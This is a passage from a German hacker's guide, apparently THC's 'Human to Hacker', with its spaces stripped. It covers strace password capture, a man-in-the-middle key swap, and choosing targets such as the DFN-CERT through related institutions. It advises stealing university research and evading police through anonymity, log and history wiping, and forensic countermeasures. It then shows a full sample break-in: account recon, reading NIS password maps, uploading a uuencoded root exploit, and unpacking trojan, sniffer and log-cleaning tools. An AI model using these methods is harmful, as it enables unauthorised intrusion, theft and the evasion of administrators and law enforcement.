DerueblichetelnetKramwirddemUserangezeigt.
<[pid772]:recv(3,"\ff\fb\1\r\nLinux1.1.59(doo.thehaze"..,1024,0)=49
<[pid772]:write(1,"\r\nLinux1.1.59(doo.thehaze.or"..,46)=46

DasWelcomeBannerdesRemoteHostswirdempfangenundandenUserweitergegeben.
<[pid772]:recv(3,"\ff\f2\r\ndoologin:",1024,0)=15
<[pid772]:write(1,"\r\ndoologin:",13)=13

DieLoginAufforderung.
<[pid772]:read(0,"t",1024)=1
https://www.thc.org/papers/h2h.htm

13/42

2/26/2016

HumantoHackerVersion1.1

<[pid772]:send(3,"t",1,0)=1
<[pid772]:recv(3,"t",1024,0)=1
<[pid772]:write(1,"t",1)=1

DerertseBuchstabedesLoginnamenswirdeingelesen(read(..)),anddenfernenRechnergesendet(send(..)),dasEchoempfangen
(recv(..))undzudemUsergegeben(write(..)).
<[pid772]:read(0,"i",1024)=1
<[pid772]:send(3,"i",1,0)=1
<[pid772]:recv(3,"i",1024,0)=1
<[pid772]:write(1,"i",1)=1
<[pid772]:read(0,"c",1024)=1
<[pid772]:send(3,"c",1,0)=1
<[pid772]:recv(3,"c",1024,0)=1
<[pid772]:write(1,"c",1)=1
<[pid772]:read(0,"k",1024)=1
<[pid772]:send(3,"k",1,0)=1
<[pid772]:recv(3,"k",1024,0)=1
<[pid772]:write(1,"k",1)=1
<[pid772]:read(0,"\r",1024)=1
<[pid772]:send(3,"\r\0",2,0)=2

DerLoginnameist"tick".
<[pid772]:recv(3,"\r\nPassword:",1024,0)=12
<[pid772]:write(1,"\r\nPassword:",12)=12

DerPasswortPrompt.
<[pid772]:read(0,"T",1024)=1
<[pid772]:send(3,"T",1,0)=1

ZumEinlesendesPasswortessindnurread(..)undsend(..)noetig,daesbeiUnixMaschinenueblichistdasPasswortverdeckt
einzulesen.
<[pid772]:read(0,"E",1024)=1
<[pid772]:send(3,"E",1,0)=1
<[pid772]:read(0,"S",1024)=1
<[pid772]:send(3,"S",1,0)=1
<[pid772]:read(0,"T",1024)=1
<[pid772]:send(3,"T",1,0)=1
<[pid772]:read(0,"S",1024)=1
<[pid772]:send(3,"S",1,0)=1
<[pid772]:read(0,"T",1024)=1
<[pid772]:send(3,"T",1,0)=1
<[pid772]:read(0,"R",1024)=1
https://www.thc.org/papers/h2h.htm

14/42

2/26/2016

HumantoHackerVersion1.1

<[pid772]:send(3,"R",1,0)=1
<[pid772]:read(0,"A",1024)=1
<[pid772]:send(3,"A",1,0)=1
<[pid772]:read(0,"C",1024)=1
<[pid772]:send(3,"C",1,0)=1
<[pid772]:read(0,"E",1024)=1
<[pid772]:send(3,"E",1,0)=1
<[pid772]:read(0,"\r",1024)=1
<[pid772]:send(3,"\r\0",2,0)=2
<[pid772]:recv(3,"\r\0\r\n",1024,0)=4
<[pid772]:write(1,"\r\r\n",3)=3

SeinPasswortist"TESTSTRACE".
<[pid772]:recv(3,"Lastlogin:MonSep2215:58:52"..,1024,0)=48
<[pid772]:write(1,"Lastlogin:MonSep2215:58:52"..,48)=48

DieLastloginMessage,dasEinloggenwaralsoerfolgreich.Waswollenwirmehr?

KommenwirnunzurMIMAttack.
EineMIMAttackhaengtstarkvondemProtokolfuerdenSchluesselaustausch,vonderzugrundeliegendenNetzwerkarchitektur,vom
Routingundsoweiterab.
IchwerdemaleinkleinesSzenariodarstellenbeidemeinasymmetrischer(PublicKey)Kryptoalgorithmusverwendetwird.Die
technischenFeinheitensollenunshiermalnichtinteressieren.
Nehmenwiran,dasssicheinBKABeamter(Harald)miteinemBSIAngestellten(Jochen)ueberdieneustenEntwicklungenvonundinder
THCCrewunterhaltenwill.)
ZurKommunikationwirdeintalkDerivatverwendet,welchesdieDatenencrypteduebereinComputernetzwerksendet.Desweiterenistes
dieersteKommunikation,sodasssieerstnochihrePublicKeysaustauschenmuessen.
UnserAngreifer(TICK)sitzirgendwozwischendenbeiden.Nein,nicht'irgendwo'...ermusssicheinenPlatzaussuchen,dendiePaketeauf
jedenFallpassierenmuessen(z.B.einRouter),odererklinktsichdirektinsNetzwerkein,wennerphysikalischenZugriff(z.B.beieinem
BackboneBetreiberoderimlokalenNetzvonJochenoderHarald)hat,oderermanipuliertdenDNSTree,oderveraendertdasRoutingmit
HilfevonRIP,oder,oder,oder.DerAngreifermussinderLageseinPaketeabfangen,veraendernundweitersendenzukoennendie
originalPaketeduerfennichtdenjeweiligenKommunikationspartnererreichen.
So.LasstdasSpielbeginnen!
JochenwartetaufdieVerbindungvonHarald
HaraldsendetseineChatAnfrageanJochen
dieSoftwarevonJochenundHaraldetablierenjetztdieVerbindung
TICKwirdaufdieseAktionnatuerlichaufmerksam
wennHaraldseinenPublicKeyanJochenschickt,faengtTICKihnabundsendetstattdessenseineneigenenPublicKeyanJochen
https://www.thc.org/papers/h2h.htm

15/42

2/26/2016

HumantoHackerVersion1.1

undbehaupteterkommtvonHarald
JochenempfaengtTICK'sPublicKeyunddenkterkommtvonHarald
JochenseinerseitssendetseinenPublicKeyanHarald
dasgleicheSpiel:TICKtauschtJochen'sKeygegenseineneigenenausundsendetihnanHarald
HaraldbemerktnichtsundbeginntmitderverschluesseltenKommunikation.ZurVerschluesselungbenutzternatuerlichTICK's
PublicKey
TICKempfaengtdieNachricht,dechiffriertsiemitseinemSecretKeyunderhaeltdenKlartext(dernatuerlichaufgezeichnetwird)
TICKverschluesseltdenKlartextmitdemPublicKeyvonJochen,damitJochendieNachrichtdecryptenkannundsendetden
CiphertextanJochen
JochenempfaengtdieNachrichtunddechiffriertsiemitseinemSecretKey
JochenantwortetaufHarald'sNachricht
dasSpielgehtvonVornelos,nurdasinumgekehrterRichtungnatuerlichHarald'sPublicKeyverwendetwerdenmuss
TICKlachtsichinsFaeustchen)
TICKistesinseinerPositionnichtnurmoeglichdieDatenimKlartextzulesen,sondernerkannauchDateneinfuehgenundloeschen.Er
koenntesichz.Bsp.alsHaraldausgebenundJochendiverseFragenstellenumihmsogeheimeInformationenausderNasezuziehenund
dieAntwortenloeschen,damitsieHaraldniezuGesichtbekommt.
MIMAttackenkoennendurchSignaturenfuerdiePublicKeys(z.B.einesKDCs)oderdurchdasINTERLOCKProtokol
erschwert/verhindertwerden...aberdaessichhiernichtumeinSecurityPaperhandelt,werdeichnichtnaeherdaraufeingehen.)
IchmoechtenochkurzaufeineandereArtvonAttackeeingehen,diez.B.beiSecureShellfunktioniert.
UndzwarwennderPublicKeyeinerClientServerVerbindungbekanntist,dannkanneinAngreifermitdiesemKeyeigenePakete
verschluesselnundindenStreameinfuehgen.Somitistesz.B.moeglichBefehleaneineShellzuschicken.
Nungut,umehrlichzuseinwerdendiemeistenHacksmitHilfevonRemoteExploitsundSnifferngemacht.
Abundzusolltestduauch'npaarHackerMagslesen...leidersinddiemeistenechterSchrott,wasichdirempfehlenkoennteistPhrack,
THCMag...naja,undvielleichtnochdasTFCoderCRHMag.
Achja,esgibtdanocheineMethode...haette'sfastvergessen.Ichnennesie"VerwundbarkeitaufgrundvonBeziehungen"...naja.Ok,
nehmenwirmalan,duwillstdasDFNCERThacken,kommstabernichtreinweildieihreRechnernatuerlichgutgesicherthaben.Nun
musstdueinpaarUeberlegungenueberdieBeziehungendesCERTzuanderenDomainsmachen.HiereinBsp.(''Ueberlegungund'>'
Folgerung):
dasCERThateineSubdomainimNetzdesDFNs(DeutschesForschungsNetz)
>Bez.zugrossenForschungseinrichtungenweiz.B.dasDESY,die
FrauenhoferGesellschaft,derGMDetcetera
Snifferinstallierenund/odergecrackteAccountsbeimDFNtesten.
dasDFNCERTliegtinHamburg
>SomitbestehteineBeziehungzurUni/FHHamburg
https://www.thc.org/papers/h2h.htm

16/42

2/26/2016

HumantoHackerVersion1.1

d.h.wenndudieUni/FHHamburghackstkannstdueinenSniffer
aufdieDFN(CERT)Domainansetzen
(undumehrlichzuseinwirddasDFNCERTauchvonProf.sder
UniHHgeleitet(z.B.:WolfgangLey))
>DasDESYistebenfallsinHH!
HiermitbestehtschoneinedoppelteBez.zumDESY...alsoeslohnt
sichhiermalvorbeizusehen.;)
undnocheinpaarKleinigkeitenmehr...

BeiFirmensindJointVenturesnochinteressant.

WieretteichmeinenArsch?

ZudiesemThemawerdeichnichtvielsagen,ausser,dassduHowtocoveryourtracksundAnonymousUnixvonvanHauser/THClesen
solltest.Ichkannnurnochhinzufuegen:
UnterschaetzeniemalsdieAdminsunddieBullen.
Wenndunichtwirklichgutbist,dannlass'dieFingervomCERT,Firewallsetc...dubekommstnurAerger.
InformieredichueberdieGesetzedeinesLandes(wennduinDtld.wohnst,dannwirfmaleinenBlickin'sTHCMag4)!
BereitedichpsychischundtechnischaufeineHausdurchsuchungvor.WenndieBullenvorderTuerstehenundduverlierstdie
Nerven,dannwirstduvieleFehlermachen,dienichthaettenseinmuessen.
ZerstoerenichtsundklauekeineFirmengeheimnisse(esseidennsiesindfuerHackerinteressant).
LoeschealleKomponentendeinerHackingToolsundExploitsmitsrmo.ae.,damitmansienichtdurchrohesAuslesenderHD
rekonstruierenkann.
StichworteForensic:AuchbeidirwirdimLaufederZeitdieRoutineeintretenunddugewoehnstdiran,bestimmte
https://www.thc.org/papers/h2h.htm

17/42

2/26/2016

HumantoHackerVersion1.1

Befehle/Files/ExploitsimmerinderselbenReihenfolgezubenutzenunddamithinterlaesstdueinensubtilenaberexistenten
"Fingerabdruck".AusdiesemGrundempfehleichdirdringenddiea/mtimeTimederbenutztenFileszuveraendernamBesten
natuerlichnichtzuveraendern,alsodiealteZeitzusetzen.
DasselbegiltauchfuerdieHomedirec.sderAccounts,diedubenutzthast.Einlsald/home/*istgenausoeffektivwiederAufruf
vonlast.
DusolltestdireinProgrammschreiben(oderbenutzeindent),dasdasFormatdeinerSourceCodesvoelligaufhebt,sodassz.B.dein
SourceCodenurauseinerlangenZeilebesteht.EsexistierennaemlichmehrereSecurityPapers,diesichdamitbeschaeftigenden
AutoreinesProgramsanhandseinesProgrammierstilszuerkennen(wurdeauchbeimInternetWormvonRobertT.Morris
angewandtsokonntefestgestelltwerden,dassderBufferoverflowExploitfuerfingerdnichturspruenglichvonMorrisstammt).
DesweiterensolltestdukeineextravagantenBezeichnungenbeiderBenennungdeinerFunktionenundVariablenwaehlen.Dasnuetzt
natuerlichallesnichts,wenndudeinenHandleindenQuellcodeschreibst.)

EinpaarGedankenzumSeineinesHackers

Naja,dasBildistmiretwaszuschwarzweiss(unddashatnichtsmitderFarbezutun).
InmeinenAugenvereinigteinHackerbeide"Personen"(NoRiskNoFun).
EinpaarRegelnsolltestduimmerimHinterkopfbehalten:
ZerstoerekeineRechner/Netze
keineErpressung
keineIndustriespionage
hacknichteinfachwiewild1000Rechnernurweileseinfachist,nimmmal'npaarHerausforderungenan
undnoch'neMengeandererKramdergegendieEhtikeinesHackersverstoesst,mirjetztabernichteinfaellt...

Yeah,timetobecome31337.
Ok,irgendwannwirddasalleslangweiligund/oderdieDomain,indieduunbedingthineinwillstistdichtwie'nBunker.
JetztwirdesZeitseineeigenenToolsundRemoteExploitszuentwickeln.
https://www.thc.org/papers/h2h.htm

18/42

2/26/2016

HumantoHackerVersion1.1

Dazuistfolgendesnoetig:
1.natuerlichsolltestdufitimProgrammierenunterUnixsein(C,C++,Perl,ShellSpachen).
2.dusolltestdieExploits(vonBugtraqetc)genaustudierenundeinenUeberblickundeinVerstaendnisfuerdieSicherheitvon
Programmenbekommen
das'Nachprogrammieren'vonExploitsuebtungemein)
3.derUmgangmitToolswiestrace,ltrace,gdb,purify&Co.solltedirvertrautsein,damitduauchohneSourceCodeBugsin
Programmeneruierenkannst
4.besorgedirdiverseDocsueberdassichereProgrammierenvonUnixSoftwarehttp://www.sun.com/sunworldonline/swol04
1998/swol04unixsecurity.htmlhttp://www.sun.com/sunworldonline/swol041998/swol04security.html
http://www.homeport.org/~adam/review.htmlhttp://olympus.cs.ucdavis.edu/~bishop/secprog.html
http://www.research.att.com/~smb/talks/odds.[ps|pdf]http://www.pobox.com/~kragen/securityholes.txt
5.undvergissnicht,sovielSourceCodeswiemoeglichvondenverschiedenenUnixDerivatenzubekommen,diedugehackthast
wennduGlueckhastistnochdieInstallationsCDimCDRom(ichhoffemitSources))
ja,undweilkopiereneinfacheristalsselberschreiben,solltestdubedenken,dasProgramme,dieunterz.B.Linux'nenBughaben
hoechstwahrscheinlichauchunter*BSDbuggysind(ok,mit99,9%igerAusnahmevonOpenBSD)...
undsolltestdumalkeinExploitvon'nembereitsgefixtenBughaben,dannbesorgedirdasPatchundversucheanhanddessendein
Exploitzucoden(esistzwarbloed,dassesschonbekanntist,aberdiemeistenAdminshabenmehrProblemedamitihrNetzam
LaufenzuhaltenalsdieBugsinirgendwelchenProgrammenzupatchen)
DusolltestniemandendieMoeglichkeitgebeneinProfilvondiranzufertigen,dazuistfolgendeszubeachten
1.HaltenurzusehrgutbefreundetenHackernkontakt.
WenndumitihnenEmailsaustauscht,dannsolltensienatuerlichmitPGPencryptedsein,zueinemanonymenAccountgehen
(benutzekeinengehacktenAccount,besserwww.hotmail.com,www.yahoo.com,www.gmx.net(mitPOP!!!)...derRechnersollte
natuerlichimAuslandstehen,dieErmittlungsbehoerdenschreckenhaeufigvordemPapierkriegzurueck,sindauchnurMenschen)
unterVerwendungeinesspeziellenHandles,dendufuernichtsanderesverwendest.
DusolltestdenHandle/AccountunregelmaessigaendernundnatuerlichaucheinneuesPGPseckeypubkeyPaarerstellen(auchdie
Passphraseaendern!).
Achtedarauf,dassdeinPGPKeymitmindestens2048bitSchluessellaengegeneriertwird,ausserdemsolltestduaus
Sicherheitsgruendennichtdie5.xVersionbenutzen,sondernbeidiealten2.6.xVersion!!!
2.WenndudichunbedingtaufdeneinschlaegigenIRCChannelsrumtreibenwillst,dannaendereimmerdeinenNickundwechselauch
deinenHost(davieleRechnerimInternetkeineircClientsinstallierthaben,solltestduRelaysbenutzen(oderauchIPSource
RoutingundIPSpoofing,probiersaus)).
https://www.thc.org/papers/h2h.htm

19/42

2/26/2016

HumantoHackerVersion1.1

Ichweiss,dassdasaenderndesNicksnichtsoschoenist,weilmandadurchkeineReputationbeiderbreitenMassebekommtaber
Reputationistsotoetlichwienuetzlich(andereHackerakzeptierendichsofortundsindetwasgeschwaetzigerdirgegenueberum
sichzuprofilierenaberwennduerstmalsoweitbist,dassdudeineeigenenExploitsschreibst,dannbistduaufdengroesstenTeil
derHackersowiesonichtmehrangewiesen,unddeninteressantenResttriffstdunichtsoeinfachimIRC).
NuetzlichsindhiersogenannteRedirector,dieeineTCPVerbindungweiterleiten,wasauchschoninderHinsichtinteressantist,
wennmansichvorAttackenvonanderenHackerschuetztenwill,wennmanaufdemIRCzuvielAergerverursachthat))
AuchhierkoenntestdunatuerlicheinenspeziellenAccountfuer'sIRCbenutzen.
DiePolizeifertignachweislichLogsvondenIRCChatsan.(Netguruhabensiesogefasst,undderwarpsychischnichtdarauf
vorbereitet,haha)
Ach,lasseinfachdieFingervomIRC.
Eswaerecool,wennsichmal`npaarvoneuchdieZeitnehmenwuerdenumeinCryptoIRCaufBasisvonSSHaufzubauen.
Ok,desweiterensolltestdudirGedankenmachenwoherdudenSourceCodevonkommerziellenBetriebssystemenbekommenkoenntest.
DieQuellenvonLinux,*BSDundSolariskannstduzumGluecklegalerwerbenMicrosoftgibtdenSourceCodevonNTanUnisweiter.
JetztmusstdudichdaranmachenundversuchenZugriffaufdenQuellcodevondiversenFirewallsundIntrusionDetectionSystemszu
erlangendabeihelfendirdieprivatenExploitsderBetriebssystemederenSourcendugesammelthast.DerSourceCodederGauntlet
FirewallistgegenetwasGeldzuhaben(aberAFAIKnichtmehrvondenneuenVersion),davonmalabgesehenbasiertderCodeeiniger
ProxiesaufdemdesTISFWTK(washingegennichtskostet).
ErfahrungenmitdemAufbaudergaengigenFirewallProdukteistunerlaesslich.DusolltestalsNebenjobodernatuerlichauch
hauptberuflichimITSicherheitsbereicharbeitenumsolegalundkostenlosNetzwerksicherheitsSystemeevaluierenzukoennenundsomit
derenSchwachstellenzukennen.
HalteAusschaunachUniversitaetenundForschungsinstitute,dieimComputersicherheitsbereichForschungbetreibenundkopieredirdie
Forschungsdaten,nachdemdusiegehackthast.Esistzwarnichtsehrwahrscheinlich,dasseineDoktorarbeitkommerziellvermarktetwird,
aberderTyp,derdieArbeitverfassthat,wirdeinengutbezahltenJobbeieinergrossenFirmabekommenunddortseineSysteme
(weiter)entwickeln.DieseSystemebasierenmithoherWahrscheinlichkeitzumgrossenTeilaufAlgorithmenundQuelltextenseiner
Doktorarbeit...)
Nunja,grosseForschungeinrichtungenwerdenversuchen,ihreSystemaufdenMarktzubringen(evtl.mitHilfeeinergroesserenFirma)und
wennmandanndenSourceeinesweitverbreitetenProduktsbesitzt,dannistmanKoenig.DasLustigeist,dasssolcheForschungsscheunen
StudentenbeschaeftigenumGeldzusparen,unddiehabenmeistenskeineAhnungvonsichererProgrammierungoder/undbewahren
Forschungsdaten,mitdenensiearbeitenmuessen,ungeschuetztaufihrenWindowsPCsauf.
IndenUSAarbeitendieUniversitaetenoftmitderRegierungzusammen,dasselbegiltfuerJapan,dortarbeitenUniversitaeten,Konzerne
unddieRegierunghandinhandnaja,washaettenwirsonstvonunserenBORGserwartet?DieserUmstandmachtesdireinfachdie
Firewallsder*.gov'sund*.com'szuhacken.
Ichhoffe,duhastjetzteineVorstellungdavonbekommen,wassoabgeht...
Erfahrungenmit(digitalen)TkAnlagenundderenSicherheitsproblematikistunabdingbar.Esnuetztnichtviel,wenndueienenexternen
RemoteZugangzueinerWartungseinheithackstunddannnichtsdamitanzufangenweisst.
https://www.thc.org/papers/h2h.htm

20/42

2/26/2016

HumantoHackerVersion1.1

Bla,bla,bla...genugmitdem"Kochbuch"!

EinBlickueberdieSchulter
Ok,beimZuguckenlerntmanamSchnellsten.
AlsohierfolgteinBeispielhackmitdenentsprechendenKommentaren.
Wirgehenmaldavonaus,dasswirdenAccountgesniffed(odersonstwiebekommen)habenunddasswiralleMassnahmendurchgefuehrt
habenumunserePraesenzaufdemAusgangsrechnerzuverbergen.DesweiterenwirddirganzeSessionnatuerlichdurchunser
Terminalprogramm(keinIP)aufgezeichnet.
source>finger@victim.domain.com
[]
WelcometoLinuxversion2.0.33atvictim.domain.com!
6:21pmup6:10h,0users,loadaverage:0.28,0.11,0.10
Nooneloggedin.
source>
Soka,esscheintkeinereingeloggtzusein,aberwirwerdenesaufdemRechnernochgenauerueberpruefen.
source>echo$SHELL
/bin/bash
source>unsetUSER
source>unsetMAIL
source>unsetHOME
source>unsetPRINTER
source>telnet
telnet>ovictim.domain.com
Trying10.255.0.1...
Connectedtolocalhost.
Escapecharacteris'^]'.
Linux2.0.33(victim.domain.com)(ttyp4)

https://www.thc.org/papers/h2h.htm

21/42

2/26/2016

HumantoHackerVersion1.1

victimlogin:johnny
Password:
Havealotoffun...
Lastlogin:WedJun1719:16:07ontty3.
Nomail.
DieEnvironmentvariablenUSER,MAIL,HOME,PRINTERundUID(wennduunterXarbeitest,dannvergissdieVariablenXTERMund
DISPLAYnicht)werdenvontelnetzutelnetduebertragen,somitkanneinAdminInformationenueberdenHackeraccountbekommen
(z.B.mitnoshell)waswirnatuerlichnichtwollen.AusdiesemGrundloeschenwirdieseWerte,leideristUIDreadonlyundkannnichtvon
unsgeaendertwerdenevtl.geht'suebereinCProgram,welcheseinvoelligneuesEnvironmentkonstruiertundanschliessendtelnet,eine
Shelloderwasauchimmerexec'd,ichhab'keineAhnung.
EinBestandteildesProtokolsderrTools(rlogin,rcp,rshbzw.remshetc)istderlokaleUsernameesistalsovonderVerwendungdieser
Toolsabzuraten.
Vielleichthastdudichgefragtwarumwirtelnetinteraktivbenutzen,nungut,derGrundisteinfach:damitverhindernwir,dassder
ZielrechnerinderProzesslistevonsource'auftaucht.
victim:/home/johnny>rloginvictim
Password:
Havealotoffun...
Lastlogin:WedJun1719:16:07onttyp4fromsource.ass.com.
Nomail
victim:/home/johnny>exit
rlogin:connectionclosed.
victim:/home/johnny>cshf
victim%lsaltr
[...]
rw1testusers450Jul611:38.bash_history
victim%unsetHISTFILE
victim%cat/dev/zero>.bash_history
^C
victim%rm.bash_history
Ja,alleswaswirhiergemachthabenistunsereSpurenetwaszuverschleiernunddasohnerootRechte.Durchrlogin(telnetgehtnatuerlich
auch)koennenwirunserenLastlogEntryueberschreibenundwasabsolutwichtigist,istdassdasHistoryFilegeloeschtwirdundumkein
neuesFilezuerzeugenrufenwirdiecshauf,dieperdefaultkeinHistoryFileerstellt(wennderUserdiecshbenutztkannstduauchdie
BourneShellshverwenden,abervorsicht,dennunterLinuxz.B.ist/bin/sheinLinkauf/bin/bash).
DasHistoryFilemusstduunbedingtamAnfangdeinerSitzungloeschen,dennwennderAdmindichbemerktundeinenHardLinkaufdas
Filemacht,dannbleibendieDatenaufderHDerhaltenundderAdminkannueberdenHardLinkdaraufzugreifen.
https://www.thc.org/papers/h2h.htm

22/42

2/26/2016

HumantoHackerVersion1.1

FallsloginSUIDrootinstalliertist,hastdudieMoeglichkeitauchdeinutmp[x]Entryzuueberschreiben,dazurufstdueinfachloginauf
undloggstdichein.
victim%w
6:54pmup6:43h,1users,loadaverage:0.08,0.09,0.08
USERTTYLOGIN@IDLEJCPUPCPUWHAT
johnnyttyp46:35pm0:010:000:00w
victim%psau
USERPID%CPU%MEMVSZRSSTTSTATSTARTTIMECOMMAND
root1440.00.1800241S12:120:00mingetty
root1450.00.080082S12:120:00mingetty
root1460.00.1800283S12:120:00mingetty
root1470.00.080004SW12:120:00mingetty
root1480.00.080005SW12:120:00mingetty
root1490.00.080006SW12:120:00mingetty
johnny16410.04.617481064p4S18:350:00bash
johnny16910.01.7928408p4R18:570:00psau
HierueberpruefenwirnochmalgenauobnichtdocheinAdmineingeloggtist,derfingerdmodifiziertoderseineEintraegeausw/utmp[x]
geloeschthat.Wieesaussiehtist'johnny'dereinzigeUser,deronlineist.
victim%domainname
korn.domain.nis
victim%ypwhich
chi
victim%ypcatypservers
chi
fieldy
So,alserstesholenwirunsInfosueberderenNIS.DenNISDomainnameunddenNISServerkoennenwirspaeterbenutzenumdiverse
NISMapszutransferierenz.B.diePasswdMapnachdemwirrausgeflogensind.NISistfastzu100%indenDomainsinstalliert.Nur
wenigebenutzenrdist,NIS+oderDCE.EinProgram,dasunsdenZugriffaufdenNISServerermoeglichheisstypx.
victim%arpa
fred.domain.com(10.255.0.4)at00:C0:24:A4:3B:B2[ether]oneth0
bambam.domain.com(10.255.0.3)at00:00:0C:A1:32:F2[ether]oneth0
hombre.domain.com(10.255.0.43)at08:00:02:C1:FB:32[ether]oneth0
deep.domain.com(10.255.0.24)at00:05:02:E1:12:B2[ether]oneth0
https://www.thc.org/papers/h2h.htm

23/42

2/26/2016

HumantoHackerVersion1.1

[...]
EinkurzerBlickindenARPCachedesRechnerszeigtunswelcheHardwareimNetzverwendetwird.DieerstendreiBytesderEthernet
AdressesindeinIndikatorfuerdenHerstellerderNetzkarte.
fred>unbekannt,evtl.PC
bambam>CiscoRouter
hombre>SunMicrosystems
deep>AppleMac.
Natuerlichgibt'snochanderebekannteHersteller:HP,SGI,Cray...
victim%unamea
Linuxwallace2.0.33#4SunJul611:43:22MEST1998686unknown
victim%ypcatpasswd
proj:FbxcM/NyIxf7w:501:100:ProjectAccount:/home/proj:/bin/bash
test:x:502:100:TestAccount:/home/test:/bin/bash
[...]
victim%cat/etc/passwd
root:x:0:0:root:/root:/bin/bash
[...]
victim%ypcatgroup
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:
tty:x:5:
[...]
victim%cat/etc/group
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:
tty:x:5:
[...]
victim%ypcathosts
127.0.0.1localhost
[...]
https://www.thc.org/papers/h2h.htm

24/42

2/26/2016

HumantoHackerVersion1.1

victim%cat/etc/hosts
127.0.0.1localhost
[...]
victim%cat/etc/syslog.conf
#/etc/syslog.confConfigurationfileforsyslogd(8)
#
#Forinfoabouttheformatofthisfile,see"mansyslog.conf".
#
#
#
#printmostontty10
kern.warn*.errauthpriv.none/dev/tty10
*.emerg*
[...]
victim%cat/etc/inetd.conf
#See"man8inetd"formoreinformation.
#
#Ifyoumakechangestothisfile,eitherrebootyourmachineorsendthe
#inetdaHUPsignal:
#Doa"psx"asrootandlookupthepidofinetd.Thendoa
#"killHUP<pidofinetd>".
#Theinetdwillrereadthisfilewheneveritgetsthatsignal.
#
#<service_name><sock_type><proto><flags><user><server_path><args>
#
#echostreamtcpnowaitrootinternal
#echodgramudpwaitrootinternal
#discardstreamtcpnowaitrootinternal
#discarddgramudpwaitrootinternal
#daytimestreamtcpnowaitrootinternal
#daytimedgramudpwaitrootinternal
#chargenstreamtcpnowaitrootinternal
#chargendgramudpwaitrootinternal
#timestreamtcpnowaitrootinternal
#timedgramudpwaitrootinternal
[...]
https://www.thc.org/papers/h2h.htm

25/42

2/26/2016

HumantoHackerVersion1.1

JetzthabenwiralleInformationendiewirbenoetigenumdieLogVerwaltungzuanalysierenundumunserenZugriffzu
festigen/wiederzuerlangen.
victim%mkdir/tmp/".."
victim%cd/tmp/".."
victim%uudecode
begin644mexpl.gz
M"B,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C
M(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,*(PD)"0D)"0D)
M"2`@("`@(",*(PD@("`@(%5.25@@26YT97)A8W1I=F4@5&]O',@"XR8B!C
MVYF:6=U<F%T:6]N(&9I&4)"2`@("`@(",*(PD@($O<'ER:6=H="`H8RD@
M5'5DW(@2'5L=6)E:2`F($%N9')E:2!0:71I<RP@36%Y(#$Y.30)("`@("`@
M"2`@("`@(",*(PD)"0D)"0D)"2`@("`@(",*(R,C(R,C(R,C(R,C(R,C(R,C
M(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C
M(R,C(R,C(R,C(R,C(R,C(PH*"B,*(R!X=&5R2!CVYF:6=U<F%T:6]N(&9I
M&4@*%@@=VEN9&]W('Y<W1E2DN"B,@268@>6]U(&%R92!U<VEN9R!CVQO
M<E]X=&5R2!CVYS:61E<B!C:&%N9VEN9R!,:6YU>$OGO&4@86YD"B,@
M0V]LW)VYI=&]R('1O($].+@HC"@H*(PHC("`M($EF("=,:6YU>$O&]R
[...]
victim%lsaltr
drwxrxrx2johnnyusers1024Jul611:39.
drwxrwxrwt7rootroot1024Jul611:39..
rwrr1johnnyusers2345Jul511:41mexpl.gz
victim%gunzip*.gz
victim%chmodu+xmexpl
victim%mexpl
bash#whoami
root
bash#unsetHISTFILE
bash#rm~/.bash_history
AlsersteshabenwireinArbeitsdirec.eingerichtetundanschliessendwurdedasBinaryeinesmountExploits,
welcheszuvoruuencode'dwurde,uebertragen.
DasTransferierendesImagesistrechtsimpel(VerwendungeinesTerminalprog.s,keinePPP/IPVerbindung)
needle>uuencodemexpl.gzmexpl.gz>/dev/modem
NurfuerdenFall,dassichauswelchenGruendenauchimmerdenCompilereinsesSystemsnichtbenutzenkann,sammelichvon
meinenHackertoolsundExploitsdieBinariesderverschiedenenPlattformenumsiewieobengezeigtzuuebertragen.
https://www.thc.org/papers/h2h.htm

26/42

2/26/2016

HumantoHackerVersion1.1

bash#uudecode
begin644tools.tar.gz
M"B,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C
M(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,*(PD)"0D)"0D)
M"2`@("`@(",*(PD@("`@(%5.25@@26YT97)A8W1I=F4@5&]O',@"XR8B!C
MVYF:6=U<F%T:6]N(&9I&4)"2`@("`@(",*(PD@($O<'ER:6=H="`H8RD@
M5'5DW(@2'5L=6)E:2`F($%N9')E:2!0:71I<RP@36%Y(#$Y.30)("`@("`@
M"2`@("`@(",*(PD)"0D)"0D)"2`@("`@(",*(R,C(R,C(R,C(R,C(R,C(R,C
M(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C
M(R,C(R,C(R,C(R,C(R,C(PH*"B,*(R!X=&5R2!CVYF:6=U<F%T:6]N(&9I
M&4@*%@@=VEN9&]W('Y<W1E2DN"B,@268@>6]U(&%R92!U<VEN9R!CVQO
M<E]X=&5R2!CVYS:61E<B!C:&%N9VEN9R!,:6YU>$OGO&4@86YD"B,@
M0V]LW)VYI=&]R('1O($].+@HC"@H*(PHC("`M($EF("=,:6YU>$O&]R
M0V]N<V]L92<@86YD("=#VQO<DUOFETW(G(&%R92!BW1H($].+"!54E4
M>'AX+4O&]R70HC(&1E<VR:7!T:6]N<R!W:6QL(&)E('5S960N"B,@("T@
M268@>6]U(&%R92!WW)K:6YG(&]N(&$@3&EN=7@@<WES=&5M(&)U="!YW4@
[...]
bash#tarxvzftools.tar.gz
searcher
smeagol_v4.4.4.tar
clear13b.c
sutrojan
linsniffer.c
srm.c
ifconfig
fix
askhandle
bash#gccocbclear13b.c
bash#./cbjohnny
wtmp...utmp...lastlog...Done!
Lastentryclearedfromuserjohnny
bash#w
3:28pmup4:33h,0users,loadaverage:0.42,0.15,0.04
USERTTYLOGIN@IDLEJCPUPCPUWHAT
bash#
Ziiip!...Mitclear13bhabenwirunsereaktuellenEintraegeausw/utmp[x]undlastlogentfernt.Dusolltestdaraufaufpassen,dassdein
LogcleanerkeineLoecherindenDateien,d.h.dieEintraegeeinfachmit'0'ueberschreibt,hinterlaesst,denndiekoennenleichtvon
https://www.thc.org/papers/h2h.htm

27/42

2/26/2016

HumantoHackerVersion1.1

ProgrammendesCERT'sentdecktwerden.
